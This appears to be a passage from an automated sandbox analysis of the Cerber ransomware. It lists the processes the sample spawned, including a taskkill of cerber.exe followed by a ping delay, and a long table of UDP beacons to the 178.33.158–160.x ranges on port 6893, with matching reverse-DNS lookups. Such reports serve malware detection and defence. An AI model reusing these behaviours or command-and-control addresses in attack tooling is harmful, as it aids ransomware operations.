C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "cerber.exe"
C:\Windows\SysWOW64\PING.EXE
ping -n 1 127.0.0.1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=2112 --field-trial-handle=2264,i,15001568551143786084,90255922961447677,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 13.107.246.64:443 | tcp | |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| FR | 178.33.158.0:6893 | udp | |
| FR | 178.33.158.1:6893 | udp | |
| FR | 178.33.158.2:6893 | udp | |
| FR | 178.33.158.3:6893 | udp | |
| FR | 178.33.158.4:6893 | udp | |
| FR | 178.33.158.5:6893 | udp | |
| FR | 178.33.158.6:6893 | udp | |
| FR | 178.33.158.7:6893 | udp | |
| FR | 178.33.158.8:6893 | udp | |
| FR | 178.33.158.9:6893 | udp | |
| FR | 178.33.158.10:6893 | udp | |
| FR | 178.33.158.11:6893 | udp | |
| FR | 178.33.158.12:6893 | udp | |
| FR | 178.33.158.13:6893 | udp | |
| FR | 178.33.158.14:6893 | udp | |
| FR | 178.33.158.15:6893 | udp | |
| FR | 178.33.158.16:6893 | udp | |
| FR | 178.33.158.17:6893 | udp | |
| FR | 178.33.158.18:6893 | udp | |
| FR | 178.33.158.19:6893 | udp | |
| FR | 178.33.158.20:6893 | udp | |
| FR | 178.33.158.21:6893 | udp | |
| FR | 178.33.158.22:6893 | udp | |
| FR | 178.33.158.23:6893 | udp | |
| FR | 178.33.158.24:6893 | udp | |
| FR | 178.33.158.25:6893 | udp | |
| FR | 178.33.158.26:6893 | udp | |
| FR | 178.33.158.27:6893 | udp | |
| FR | 178.33.158.28:6893 | udp | |
| FR | 178.33.158.29:6893 | udp | |
| FR | 178.33.158.30:6893 | udp | |
| FR | 178.33.158.31:6893 | udp | |
| FR | 178.33.159.0:6893 | udp | |
| FR | 178.33.159.1:6893 | udp | |
| FR | 178.33.159.2:6893 | udp | |
| FR | 178.33.159.3:6893 | udp | |
| FR | 178.33.159.4:6893 | udp | |
| FR | 178.33.159.5:6893 | udp | |
| FR | 178.33.159.6:6893 | udp | |
| FR | 178.33.159.7:6893 | udp | |
| FR | 178.33.159.8:6893 | udp | |
| FR | 178.33.159.9:6893 | udp | |
| FR | 178.33.159.10:6893 | udp | |
| FR | 178.33.159.11:6893 | udp | |
| FR | 178.33.159.12:6893 | udp | |
| FR | 178.33.159.13:6893 | udp | |
| FR | 178.33.159.14:6893 | udp | |
| FR | 178.33.159.15:6893 | udp | |
| FR | 178.33.159.16:6893 | udp | |
| FR | 178.33.159.17:6893 | udp | |
| FR | 178.33.159.18:6893 | udp | |
| FR | 178.33.159.19:6893 | udp | |
| FR | 178.33.159.20:6893 | udp | |
| FR | 178.33.159.21:6893 | udp | |
| FR | 178.33.159.22:6893 | udp | |
| FR | 178.33.159.23:6893 | udp | |
| FR | 178.33.159.24:6893 | udp | |
| FR | 178.33.159.25:6893 | udp | |
| FR | 178.33.159.26:6893 | udp | |
| FR | 178.33.159.27:6893 | udp | |
| FR | 178.33.159.28:6893 | udp | |
| FR | 178.33.159.29:6893 | udp | |
| FR | 178.33.159.30:6893 | udp | |
| FR | 178.33.159.31:6893 | udp | |
| FR | 178.33.160.0:6893 | udp | |
| FR | 178.33.160.1:6893 | udp | |
| FR | 178.33.160.2:6893 | udp | |
| FR | 178.33.160.3:6893 | udp | |
| FR | 178.33.160.4:6893 | udp | |
| FR | 178.33.160.5:6893 | udp | |
| FR | 178.33.160.6:6893 | udp | |
| FR | 178.33.160.7:6893 | udp | |
| FR | 178.33.160.8:6893 | udp | |
| FR | 178.33.160.9:6893 | udp | |
| FR | 178.33.160.10:6893 | udp | |
| FR | 178.33.160.11:6893 | udp | |
| FR | 178.33.160.12:6893 | udp | |
| FR | 178.33.160.13:6893 | udp | |
| FR | 178.33.160.14:6893 | udp | |
| FR | 178.33.160.15:6893 | udp | |
| FR | 178.33.160.16:6893 | udp | |
| FR | 178.33.160.17:6893 | udp | |
| FR | 178.33.160.18:6893 | udp | |
| FR | 178.33.160.19:6893 | udp | |
| FR | 178.33.160.20:6893 | udp | |
| FR | 178.33.160.21:6893 | udp | |
| FR | 178.33.160.22:6893 | udp | |
| FR | 178.33.160.23:6893 | udp | |
| FR | 178.33.160.24:6893 | udp | |
| FR | 178.33.160.25:6893 | udp | |
| FR | 178.33.160.26:6893 | udp | |
| FR | 178.33.160.27:6893 | udp | |
| FR | 178.33.160.28:6893 | udp | |
| FR | 178.33.160.29:6893 | udp | |
| FR | 178.33.160.30:6893 | udp | |
| FR | 178.33.160.31:6893 | udp | |
| FR | 178.33.160.32:6893 | udp | |
| FR | 178.33.160.33:6893 | udp | |
| FR | 178.33.160.34:6893 | udp | |
| FR | 178.33.160.35:6893 | udp | |
| FR | 178.33.160.36:6893 | udp | |
| FR | 178.33.160.37:6893 | udp | |
| FR | 178.33.160.38:6893 | udp | |
| FR | 178.33.160.39:6893 | udp | |
| FR | 178.33.160.40:6893 | udp | |
| FR | 178.33.160.41:6893 | udp | |
| FR | 178.33.160.42:6893 | udp | |
| FR | 178.33.160.43:6893 | udp | |
| FR | 178.33.160.44:6893 | udp | |
| FR | 178.33.160.45:6893 | udp | |
| FR | 178.33.160.46:6893 | udp | |
| FR | 178.33.160.47:6893 | udp | |
| FR | 178.33.160.48:6893 | udp | |
| FR | 178.33.160.49:6893 | udp | |
| FR | 178.33.160.50:6893 | udp | |
| FR | 178.33.160.51:6893 | udp | |
| FR | 178.33.160.52:6893 | udp | |
| FR | 178.33.160.53:6893 | udp | |
| FR | 178.33.160.54:6893 | udp | |
| FR | 178.33.160.55:6893 | udp | |
| FR | 178.33.160.56:6893 | udp | |
| FR | 178.33.160.57:6893 | udp | |
| FR | 178.33.160.58:6893 | udp | |
| FR | 178.33.160.59:6893 | udp | |
| FR | 178.33.160.60:6893 | udp | |
| FR | 178.33.160.61:6893 | udp | |
| FR | 178.33.160.62:6893 | udp | |
| FR | 178.33.160.63:6893 | udp | |
| FR | 178.33.160.64:6893 | udp | |
| FR | 178.33.160.65:6893 | udp | |
| FR | 178.33.160.66:6893 | udp | |
| FR | 178.33.160.67:6893 | udp | |
| FR | 178.33.160.68:6893 | udp | |
| FR | 178.33.160.69:6893 | udp | |
| FR | 178.33.160.70:6893 | udp | |
| FR | 178.33.160.71:6893 | udp | |
| FR | 178.33.160.72:6893 | udp | |
| FR | 178.33.160.73:6893 | udp | |
| FR | 178.33.160.74:6893 | udp | |
| FR | 178.33.160.75:6893 | udp | |
| FR | 178.33.160.76:6893 | udp | |
| FR | 178.33.160.77:6893 | udp | |
| FR | 178.33.160.78:6893 | udp | |
| FR | 178.33.160.79:6893 | udp | |
| FR | 178.33.160.80:6893 | udp | |
| FR | 178.33.160.81:6893 | udp | |
| FR | 178.33.160.82:6893 | udp | |
| FR | 178.33.160.83:6893 | udp | |
| FR | 178.33.160.84:6893 | udp | |
| FR | 178.33.160.85:6893 | udp | |
| FR | 178.33.160.86:6893 | udp | |
| FR | 178.33.160.87:6893 | udp | |
| FR | 178.33.160.88:6893 | udp | |
| FR | 178.33.160.89:6893 | udp | |
| FR | 178.33.160.90:6893 | udp | |
| FR | 178.33.160.91:6893 | udp | |
| FR | 178.33.160.92:6893 | udp | |
| FR | 178.33.160.93:6893 | udp | |
| FR | 178.33.160.94:6893 | udp | |
| FR | 178.33.160.95:6893 | udp | |
| FR | 178.33.160.96:6893 | udp | |
| FR | 178.33.160.97:6893 | udp | |
| FR | 178.33.160.98:6893 | udp | |
| FR | 178.33.160.99:6893 | udp | |
| FR | 178.33.160.100:6893 | udp | |
| FR | 178.33.160.101:6893 | udp | |
| FR | 178.33.160.102:6893 | udp | |
| FR | 178.33.160.103:6893 | udp | |
| FR | 178.33.160.104:6893 | udp | |
| FR | 178.33.160.105:6893 | udp | |
| FR | 178.33.160.106:6893 | udp | |
| FR | 178.33.160.107:6893 | udp | |
| FR | 178.33.160.108:6893 | udp | |
| FR | 178.33.160.109:6893 | udp | |
| FR | 178.33.160.110:6893 | udp | |
| FR | 178.33.160.111:6893 | udp | |
| FR | 178.33.160.112:6893 | udp | |
| FR | 178.33.160.113:6893 | udp | |
| FR | 178.33.160.114:6893 | udp | |
| FR | 178.33.160.115:6893 | udp | |
| FR | 178.33.160.116:6893 | udp | |
| FR | 178.33.160.117:6893 | udp | |
| FR | 178.33.160.118:6893 | udp | |
| FR | 178.33.160.119:6893 | udp | |
| FR | 178.33.160.120:6893 | udp | |
| FR | 178.33.160.121:6893 | udp | |
| FR | 178.33.160.122:6893 | udp | |
| FR | 178.33.160.123:6893 | udp | |
| FR | 178.33.160.124:6893 | udp | |
| FR | 178.33.160.125:6893 | udp | |
| FR | 178.33.160.126:6893 | udp | |
| FR | 178.33.160.127:6893 | udp | |
| FR | 178.33.160.128:6893 | udp | |
| FR | 178.33.160.129:6893 | udp | |
| FR | 178.33.160.130:6893 | udp | |
| FR | 178.33.160.131:6893 | udp | |
| FR | 178.33.160.132:6893 | udp | |
| FR | 178.33.160.133:6893 | udp | |
| FR | 178.33.160.134:6893 | udp | |
| FR | 178.33.160.135:6893 | udp | |
| FR | 178.33.160.136:6893 | udp | |
| FR | 178.33.160.137:6893 | udp | |
| FR | 178.33.160.138:6893 | udp | |
| FR | 178.33.160.139:6893 | udp | |
| FR | 178.33.160.140:6893 | udp | |
| FR | 178.33.160.141:6893 | udp | |
| FR | 178.33.160.142:6893 | udp | |
| FR | 178.33.160.143:6893 | udp | |
| FR | 178.33.160.144:6893 | udp | |
| FR | 178.33.160.145:6893 | udp | |
| FR | 178.33.160.146:6893 | udp | |
| FR | 178.33.160.147:6893 | udp | |
| FR | 178.33.160.148:6893 | udp | |
| FR | 178.33.160.149:6893 | udp | |
| FR | 178.33.160.150:6893 | udp | |
| FR | 178.33.160.151:6893 | udp | |
| FR | 178.33.160.152:6893 | udp | |
| FR | 178.33.160.153:6893 | udp | |
| FR | 178.33.160.154:6893 | udp | |
| FR | 178.33.160.155:6893 | udp | |
| FR | 178.33.160.156:6893 | udp | |
| FR | 178.33.160.157:6893 | udp | |
| FR | 178.33.160.158:6893 | udp | |
| FR | 178.33.160.159:6893 | udp | |
| FR | 178.33.160.160:6893 | udp | |
| FR | 178.33.160.161:6893 | udp | |
| FR | 178.33.160.162:6893 | udp | |
| FR | 178.33.160.163:6893 | udp | |
| FR | 178.33.160.164:6893 | udp | |
| FR | 178.33.160.165:6893 | udp | |
| FR | 178.33.160.166:6893 | udp | |
| FR | 178.33.160.167:6893 | udp | |
| FR | 178.33.160.168:6893 | udp | |
| FR | 178.33.160.169:6893 | udp | |
| FR | 178.33.160.170:6893 | udp | |
| FR | 178.33.160.171:6893 | udp | |
| FR | 178.33.160.172:6893 | udp | |
| FR | 178.33.160.173:6893 | udp | |
| FR | 178.33.160.174:6893 | udp | |
| FR | 178.33.160.175:6893 | udp | |
| FR | 178.33.160.176:6893 | udp | |
| FR | 178.33.160.177:6893 | udp | |
| FR | 178.33.160.178:6893 | udp | |
| FR | 178.33.160.179:6893 | udp | |
| FR | 178.33.160.180:6893 | udp | |
| FR | 178.33.160.181:6893 | udp | |
| FR | 178.33.160.182:6893 | udp | |
| FR | 178.33.160.183:6893 | udp | |
| FR | 178.33.160.184:6893 | udp | |
| FR | 178.33.160.185:6893 | udp | |
| FR | 178.33.160.186:6893 | udp | |
| FR | 178.33.160.187:6893 | udp | |
| FR | 178.33.160.188:6893 | udp | |
| FR | 178.33.160.189:6893 | udp | |
| FR | 178.33.160.190:6893 | udp | |
| FR | 178.33.160.191:6893 | udp | |
| FR | 178.33.160.192:6893 | udp | |
| FR | 178.33.160.193:6893 | udp | |
| FR | 178.33.160.194:6893 | udp | |
| FR | 178.33.160.195:6893 | udp | |
| FR | 178.33.160.196:6893 | udp | |
| FR | 178.33.160.197:6893 | udp | |
| FR | 178.33.160.198:6893 | udp | |
| FR | 178.33.160.199:6893 | udp | |
| FR | 178.33.160.200:6893 | udp | |
| FR | 178.33.160.201:6893 | udp | |
| FR | 178.33.160.202:6893 | udp | |
| FR | 178.33.160.203:6893 | udp | |
| FR | 178.33.160.204:6893 | udp | |
| FR | 178.33.160.205:6893 | udp | |
| FR | 178.33.160.206:6893 | udp | |
| FR | 178.33.160.207:6893 | udp | |
| FR | 178.33.160.208:6893 | udp | |
| FR | 178.33.160.209:6893 | udp | |
| FR | 178.33.160.210:6893 | udp | |
| FR | 178.33.160.211:6893 | udp | |
| FR | 178.33.160.212:6893 | udp | |
| FR | 178.33.160.213:6893 | udp | |
| FR | 178.33.160.214:6893 | udp | |
| FR | 178.33.160.215:6893 | udp | |
| FR | 178.33.160.216:6893 | udp | |
| FR | 178.33.160.217:6893 | udp | |
| FR | 178.33.160.218:6893 | udp | |
| FR | 178.33.160.219:6893 | udp | |
| FR | 178.33.160.220:6893 | udp | |
| FR | 178.33.160.221:6893 | udp | |
| FR | 178.33.160.222:6893 | udp | |
| FR | 178.33.160.223:6893 | udp | |
| FR | 178.33.160.224:6893 | udp | |
| FR | 178.33.160.225:6893 | udp | |
| FR | 178.33.160.226:6893 | udp | |
| FR | 178.33.160.227:6893 | udp | |
| FR | 178.33.160.228:6893 | udp | |
| FR | 178.33.160.229:6893 | udp | |
| FR | 178.33.160.230:6893 | udp | |
| FR | 178.33.160.231:6893 | udp | |
| FR | 178.33.160.232:6893 | udp | |
| FR | 178.33.160.233:6893 | udp | |
| FR | 178.33.160.234:6893 | udp | |
| FR | 178.33.160.235:6893 | udp | |
| FR | 178.33.160.236:6893 | udp | |
| FR | 178.33.160.237:6893 | udp | |
| FR | 178.33.160.238:6893 | udp | |
| FR | 178.33.160.239:6893 | udp | |
| FR | 178.33.160.240:6893 | udp | |
| FR | 178.33.160.241:6893 | udp | |
| FR | 178.33.160.242:6893 | udp | |
| FR | 178.33.160.243:6893 | udp | |
| FR | 178.33.160.244:6893 | udp | |
| FR | 178.33.160.245:6893 | udp | |
| FR | 178.33.160.246:6893 | udp | |
| FR | 178.33.160.247:6893 | udp | |
| FR | 178.33.160.248:6893 | udp | |
| FR | 178.33.160.249:6893 | udp | |
| FR | 178.33.160.250:6893 | udp | |
| FR | 178.33.160.251:6893 | udp | |
| FR | 178.33.160.252:6893 | udp | |
| FR | 178.33.160.253:6893 | udp | |
| FR | 178.33.160.254:6893 | udp | |
| US | 8.8.8.8:53 | 1.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.158.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.159.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.159.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.159.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.159.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.159.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.159.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.159.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.159.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.159.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.159.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.159.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.159.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.159.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.159.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.159.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.159.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.159.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.159.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.159.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.159.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.159.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.159.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.159.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.159.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.159.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.159.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.159.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.159.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.160.33.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.160.33.178.in-addr.arpa | udp |
